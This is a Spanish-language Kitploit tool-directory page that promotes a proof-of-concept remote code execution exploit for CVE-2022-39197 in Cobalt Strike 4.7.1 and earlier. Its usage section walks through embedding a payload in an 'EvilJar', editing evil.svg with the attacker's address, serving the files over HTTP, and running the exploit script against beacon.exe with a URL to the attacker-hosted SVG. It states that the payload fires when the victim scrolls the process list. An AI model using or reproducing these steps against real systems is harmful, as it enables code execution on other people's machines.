Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-39197 — CobaltStrike <= 4.7.1 RCE | Kitploit
Herramientas/GitHubGitHub/its-arun/cve-2022-39197
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebComando y ControlRed TeamingDesarrollo de Payloads
GitHubits-arun/cve-2022-39197

CVE-2022-39197

CobaltStrike <= 4.7.1 RCE

Ver Repositorio
38775hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-39197 RCE POC

Uso

  • Preparar el Payload
  1. Edita Line 19 con tu payload en EvilJar/src/main/java/Exploit.java
  2. Construye usando el jar mvn clean compile assembly:single
  3. Mueve EvilJar-1.0-jar-with-dependencies.jar desde EvilJar/target/ a la carpeta serve/
  4. Edita serve\evil.svg y reemplaza [attacker]
  5. Sirve usando python3 -m http.server 8080
  • Ejecutar el Exploit
root@kitploit:~
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg

El payload se activará tan pronto como el usuario se desplace por la Lista de Procesos

POC.JPG?

1.jpg

Enlaces de Referencia

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Hay un gran análisis en profundidad de esta vulnerabilidad https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

Descargar herramienta